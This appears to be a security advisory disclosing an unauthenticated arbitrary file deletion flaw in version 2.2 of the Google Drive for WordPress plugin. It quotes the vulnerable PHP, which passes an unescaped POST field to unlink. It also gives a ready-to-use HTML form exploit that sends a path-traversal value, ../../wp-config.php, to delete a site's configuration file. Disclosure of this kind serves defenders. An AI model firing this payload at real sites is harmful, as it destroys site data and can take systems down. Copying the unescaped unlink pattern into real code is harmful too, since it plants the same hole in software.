Plugin Google Drive for WordPress 2.2 – Arbitrary File Deletion – Unlik

Details

  • Name : Google Drive for WordPress
  • Version : 2.2
  • Homepage : https://wordpress.org/plugins/wp-google-drive/

Type

  • Arbitrary File Deletion

Description

  • Type user access: Don't need of login .
  • $_POST[‘file_name’] is not escaped.

Code

 
File:  wp-content/plugins/wp-google-drive/gdrive-ajaxs.php
Line:  15 - 22

switch ( $_POST['ajaxstype'] ) {
...
case 'del_fl_bkp':
   gd_delete_listById( $_POST['id'] );
   $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH . "/" . $_POST['file_name'];
   unlink( $dir );


Proof Concept

https://www.youtube.com/watch?v=_536kM2-TZI

1 - Send data form:

<form method="post"
      action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
   <input type="text" name="ajaxstype" value="del_fl_bkp">
   <input type="text" name="file_name" value="../../wp-config.php">
   <input type="text" name="id" value="1">
   <input type="submit">
</form>
<?php

Results

file wp-config.php deleted and possibilited to restart all system

Note


Solution


Timeline

  • Date Discovery : 11/25/2017
  • Date Vendor Contact : 12/26/2017
  • Date Publish :
  • Date Resolution :